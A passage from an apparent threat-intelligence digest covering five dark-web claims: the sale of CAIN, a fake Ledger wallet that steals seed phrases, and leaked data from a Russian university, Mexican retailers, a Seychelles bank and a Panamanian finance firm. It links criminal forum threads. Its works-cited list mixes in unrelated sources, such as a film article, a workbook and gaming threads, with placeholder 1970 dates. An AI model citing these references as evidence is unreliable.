Screenshots: https://d34iuop8pidsy8.cloudfront.net/b95fb742-6e19-4f11-b1c0-1e9255e86a96.png, https://d34iuop8pidsy8.cloudfront.net/64aec11a-d501-4855-bbf0-b4c6bec35c90.png

Incident 19: Alleged sale of CAIN Malware

Summary of Breach and Affected Entities:

A threat actor claims to be selling CAIN, a malicious tool described as an evil twin of the Ledger cryptocurrency wallet app. The malware operates in five stealthy phases, including silently replacing the legitimate app with a flawless clone, harvesting mnemonic phrases via a fake recovery prompt, and executing an instant crypto theft. It then restores the original app and self-destructs, leaving no trace.

Detailed Threat Actor Profile: BUBBAS GATE

Identity and Affiliation: BUBBAS GATE is identified as a threat actor, specifically a malware developer or seller. Specific details regarding their history, motivations, or detailed TTPs are limited in the provided research material.³³ Threat actors are generally defined as individuals or groups who intentionally cause harm in the digital sphere by exploiting weaknesses in systems or networks.⁷

Motivations: The sale of malware like CAIN is primarily driven by financial gain, enabling other cybercriminals to conduct cryptocurrency theft.

Tactics, Techniques, and Procedures (TTPs):

Specific TTPs for BUBBAS GATE are not detailed in the provided research. However, the description of CAIN malware indicates sophisticated techniques for stealth, impersonation, credential harvesting (mnemonic phrases), and self-destruction to evade detection.

Impact and Broader Context:

The development and sale of specialized malware like CAIN, targeting cryptocurrency wallets, represent a direct threat to digital asset holders. This highlights the evolving sophistication of financially motivated cybercrime and the need for users to exercise extreme caution with cryptocurrency applications and prompts.

Relevant Resources:

Published URL: https://xss.is/threads/141327/

Screenshots: https://d34iuop8pidsy8.cloudfront.net/2e2242fb-9993-4941-8083-37e5bb6b7fb7.png, https://d34iuop8pidsy8.cloudfront.net/2e2f8e0f-5dab-4522-aa68-08a6948345f3.png

Incident 20: Alleged data sale of documents from a Federal State Budgetary Institution of Higher Education

Summary of Breach and Affected Entities:

The threat actor claims to be selling classified documents from the Federal State Budgetary Institution of Higher Education. The leak includes sensitive agreements and licenses related to Gazprom, Gazpromneft, INK, geological and geophysical exploration, oil and gas suppliers, and tax and legal documents dated from 2012 to 2021.

Detailed Threat Actor Profile: deabec

Identity and Affiliation: deabec is identified as a threat actor. Specific details regarding their history, motivations, or detailed TTPs are limited in the provided research material.³⁵ Threat actors are generally defined as individuals or groups who intentionally cause harm in the digital sphere by exploiting weaknesses in systems or networks.⁷

Motivations: The sale of classified documents is primarily driven by financial gain, as such information can be highly valuable on illicit markets.

Tactics, Techniques, and Procedures (TTPs):

Specific TTPs for deabec are not detailed in the provided research. Data leaks often result from exploiting vulnerabilities, phishing, or leveraging compromised credentials to gain unauthorized access to institutional networks.7

Impact and Broader Context:

The alleged sale of classified documents from a higher education institution, especially those related to major energy companies and government entities, poses a significant risk of corporate espionage, intellectual property theft, and national security implications. This highlights the critical need for robust cybersecurity in academic and research institutions, particularly those with ties to sensitive industries.

Relevant Resources:

Published URL: https://darkforums.st/Thread-Selling-classified-documents-from-Federal-State-Budgetary-Institution-of-Higher-Education

Screenshots: https://d34iuop8pidsy8.cloudfront.net/9051adce-6c66-4a5e-a5c6-3228911882da.png, https://d34iuop8pidsy8.cloudfront.net/7a9cc4b5-142b-4e8d-a859-38ba008fbbd8.png

Incident 21: Alleged data breach of Fashion Group México and GOC Makeup

Summary of Breach and Affected Entities:

The threat actor claims to have leaked a database containing 135,535 records from Fashion Group México and GOC Makeup. The data includes full names, email addresses, phone numbers, CURP, RFC, dates of birth, addresses, credit limits, loyalty program data, bank account fields, and more.

Detailed Threat Actor Profile: Rui_Deidad

Identity and Affiliation: Rui_Deidad is identified as a threat actor. Specific details regarding their history, motivations, or detailed TTPs are limited in the provided research material.³⁶ Threat actors are generally defined as individuals or groups who intentionally cause harm in the digital sphere by exploiting weaknesses in systems or networks.⁷

Motivations: Data breaches are typically driven by financial incentives, aiming to sell sensitive information on cybercrime forums.⁷

Tactics, Techniques, and Procedures (TTPs):

Specific TTPs for Rui_Deidad are not detailed in the provided research. Data breaches often result from exploiting vulnerabilities, phishing, or leveraging compromised credentials to gain unauthorized access to databases.7

Impact and Broader Context:

The breach of 135,535 records containing extensive personal and financial information from retail and makeup companies poses a significant risk of identity theft, financial fraud, and targeted marketing scams for the affected individuals. This underscores the importance of robust data security for consumer-facing businesses.

Relevant Resources:

Published URL: https://darkforums.st/Thread-FASHION-GROUP-MEXICO-135-535-RECORDS-LEAK

Screenshots: https://d34iuop8pidsy8.cloudfront.net/dc0ff990-8f64-4d2d-be44-17f081a874f9.png

Incident 22: Alleged leak of data from a Seychelle main bank

Summary of Breach and Affected Entities:

The threat actor claims to have leaked database containing client information from a major bank in Seychelles. The data allegedly includes names, dates of birth, phone numbers, addresses, and emails. While employee PINs and passwords are present, they are said to be encrypted with advanced security layers, making decryption currently impossible despite access to the AES key. The leak reportedly includes sensitive entries like government balance accounts.

Detailed Threat Actor Profile: ByteToBreach

Identity and Affiliation: ByteToBreach is identified as a threat actor. Specific details regarding their history, motivations, or detailed TTPs are limited in the provided research material.³⁷ Threat actors are generally defined as individuals or groups who intentionally cause harm in the digital sphere by exploiting weaknesses in systems or networks.⁷

Motivations: Data leaks from financial institutions are primarily driven by financial gain, as banking information is highly valuable on illicit markets.⁷

Tactics, Techniques, and Procedures (TTPs):

Specific TTPs for ByteToBreach are not detailed in the provided research. Data leaks often result from exploiting vulnerabilities, phishing, or leveraging compromised credentials to gain unauthorized access to databases.7

Impact and Broader Context:

A data leak from a major bank, even with encrypted passwords, poses a severe risk to client privacy and financial security. The presence of sensitive entries like government balance accounts suggests potential broader implications beyond individual clients, highlighting the critical need for robust cybersecurity in the banking sector.

Relevant Resources:

Published URL: https://darkforums.st/Thread-SELL-Seychelle-main-bank-clients-leak

Screenshots: https://d34iuop8pidsy8.cloudfront.net/2b754fd3-b4b7-4427-bfc2-f610b32597cf.png

Incident 23: Alleged data sale from an unidentified financial services firm in panama

Summary of Breach and Affected Entities:

The threat actor claims to be selling a database allegedly sourced from a unidentified Panamanian financial service organization, containing 60,000 entries. The data includes full names, national IDs (cedula), email addresses, monthly salaries, regions, genders, and document verification flags.

Detailed Threat Actor Profile: Lucczi

Identity and Affiliation: Lucczi is identified as a threat actor. Specific details regarding their history, motivations, or detailed TTPs are limited in the provided research material.³⁹ Threat actors are generally defined as individuals or groups who intentionally cause harm in the digital sphere by exploiting weaknesses in systems or networks.⁷

Motivations: The sale of financial data is primarily driven by financial gain, as such information can be highly valuable for fraud and other illicit activities.⁷

Tactics, Techniques, and Procedures (TTPs):

Specific TTPs for Lucczi are not detailed in the provided research. Data leaks often result from exploiting vulnerabilities, phishing, or leveraging compromised credentials to gain unauthorized access to databases.7

Impact and Broader Context:

The alleged sale of 60,000 financial records from a Panamanian firm, including sensitive details like national IDs and salaries, poses a significant risk of identity theft and financial fraud for the affected individuals. This underscores the importance of robust data protection in the financial services sector, particularly in regions that may be targeted for such data.

Relevant Resources:

Published URL: https://darkforums.st/Thread-%F0%9F%87%B5%F0%9F%87%A6-Panama-Fullz-Salary-Emails-%E2%80%94-60K-Fresh-Leads

Screenshots: https://d34iuop8pidsy8.cloudfront.net/b4239026-df01-401c-818c-5a75106f90fc.png

Conclusions

The analysis of recent cybersecurity incidents reveals several critical dynamics shaping the current threat landscape. The interconnectedness of geopolitical conflicts and cyber operations is undeniable, with state-sponsored entities and their proxies actively using the digital realm as an extension of real-world tensions. This means that geopolitical developments must be closely monitored as a key indicator for potential cyber threats, particularly for organizations operating in or having ties to conflict regions.

Furthermore, the varying nature of hacktivism demands a nuanced approach to threat assessment

Works cited

Reflections of the Israel-Iran Conflict on the Cyber World …, accessed July 6, 2025, https://socradar.io/reflections-of-israel-iran-conflict-cyber-world/
U.S. Agencies Warn of Rising Iranian Cyber Attacks on Defense, OT …, accessed July 6, 2025, https://thehackernews.com/2025/06/us-agencies-warn-of-rising-iranian.html
Using AI to identify cybercrime masterminds – Sophos News, accessed July 6, 2025, https://news.sophos.com/en-us/2025/06/30/using-ai-to-identify-cybercrime-masterminds/
XMAX – Krebs on Security, accessed July 6, 2025, https://krebsonsecurity.com/tag/xmax/
XIM4 for console? : r/Overwatch – Reddit, accessed July 6, 2025, https://www.reddit.com/r/Overwatch/comments/4xzdr9/xim4_for_console/
accessed January 1, 1970, https://forum.exploit.in/topic/261980/?tab=comments#comment-1579683
What is a Cyber Threat Actor? | CrowdStrike, accessed July 6, 2025, https://www.crowdstrike.com/en-us/cybersecurity-101/threat-intelligence/threat-actor/
Disrupting Handala: Did OP Innovate Help Silence a Major Cyber …, accessed July 6, 2025, https://op-c.net/blog/did-op-innovate-disrupt-handala-cyber-threat/
Handala (Threat Actor) – Malpedia, accessed July 6, 2025, https://malpedia.caad.fkie.fraunhofer.de/actor/handala
Brief Disruptions, Bold Claims: The Tactical Reality Behind the India …, accessed July 6, 2025, https://www.cloudsek.com/blog/brief-disruptions-bold-claims-the-tactical-reality-behind-the-india-pakistan-hacktivist-surge
Hacktivist Attacks on India Overstated Amid APT36 Espionage …, accessed July 6, 2025, https://www.infosecurity-magazine.com/news/hacktivist-attacks-india/
Rare Werewolf APT Uses Legitimate Software in Attacks on Hundreds of Russian Enterprises – The Hacker News, accessed July 6, 2025, https://thehackernews.com/2025/06/rare-werewolf-apt-uses-legitimate.html
Experts urge vigilance as lone wolf terror threats rise nationwide, citing recent attacks, accessed July 6, 2025, https://www.youtube.com/watch?v=ObeukBBWKEs
Threat actor – Wikipedia, accessed July 6, 2025, https://en.wikipedia.org/wiki/Threat_actor
FBI Identifies Lazarus Group Cyber Actors as Responsible for Theft of $41 Million from Stake.com, accessed July 6, 2025, https://www.fbi.gov/news/press-releases/fbi-identifies-lazarus-group-cyber-actors-as-responsible-for-theft-of-41-million-from-stakecom
FBI Confirms Lazarus Group Cyber Actors Responsible for Harmony’s Horizon Bridge Currency Theft, accessed July 6, 2025, https://www.fbi.gov/news/press-releases/fbi-confirms-lazarus-group-cyber-actors-responsible-for-harmonys-horizon-bridge-currency-theft
accessed January 1, 1970, https://t.me/liwaamohammad/474
accessed January 1, 1970, https://t.me/liwaamohammad/476
accessed January 1, 1970, https://t.me/liwaamohammad/477
Attack Surface Analysis of the Digital Twin and Advanced Sensor and Instrumentation Interfaces – INL Digital Library – Idaho National Laboratory, accessed July 6, 2025, https://inldigitallibrary.inl.gov/sites/sti/sti/Sort_74726.pdf
#StopRansomware: Ghost (Cring) Ransomware | CISA, accessed July 6, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-050a
Chakra (2021 film) – Wikipedia, accessed July 6, 2025, https://en.wikipedia.org/wiki/Chakra_(2021_film)
HAPPY FAMILIES – Macmillan.pl, accessed July 6, 2025, https://www.macmillan.pl/images/materials/1667556484_Gateway_to_the_World_B1_WB_U1-2.pdf
accessed January 1, 1970, https://xss.is/threads/141332/
accessed January 1, 1970, https://xss.is/threads/141330/
accessed January 1, 1970, https://xss.is/threads/141331/
Got hacked and they added an additional profile that I can’t delete and cant see it on my account center either. Any suggestions thats not deleting the account, unless theres no other way I will. : r/facebook – Reddit, accessed July 6, 2025, https://www.reddit.com/r/facebook/comments/1chtcl8/got_hacked_and_they_added_an_additional_profile/
accessed January 1, 1970, https://darkforums.st/Thread-Selling-over-500K-fresh-Philippine-fresh-user-records-for-sale
WebFusion “nosferatu” SEO/FakeAV Campaign – Zscaler, accessed July 6, 2025, https://www.zscaler.com/blogs/security-research/webfusion-nosferatu-seofakeav-campaign
The Nosferatu : r/WhiteWolfRPG – Reddit, accessed July 6, 2025, https://www.reddit.com/r/WhiteWolfRPG/comments/nxfdzu/the_nosferatu/
accessed January 1, 1970, https://darkforums.st/Thread-Selling-Som-Energia-Database-SPAIN
accessed January 1, 1970, https://darkforums.st/Thread-Plates-Chile-Database
Cloaked and Covert: Uncovering UNC3886 Espionage Operations | Google Cloud Blog, accessed July 6, 2025, https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
accessed January 1, 1970, https://xss.is/threads/141327/
accessed January 1, 1970, https://darkforums.st/Thread-Selling-classified-documents-from-Federal-State-Budgetary-Institution-of-Higher-Education
accessed January 1, 1970, https://darkforums.st/Thread-FASHION-GROUP-MEXICO-135-535-RECORDS-LEAK
Threat actor | Malwarebytes Glossary, accessed July 6, 2025, https://www.malwarebytes.com/glossary/threat-actor
accessed January 1, 1970, https://darkforums.st/Thread-SELL-Seychelle-main-bank-clients-leak
Minor in Computer Crime and Forensics – Loyola University Chicago, accessed July 6, 2025, https://www.luc.edu/forensicscience/minor.shtml
accessed January 1, 1970, https://darkforums.st/Thread-%F0%9F%87%B5%F0%9F%87%A6-Panama-Fullz-Salary-Emails-%E2%80%94-60K-Fresh-Leads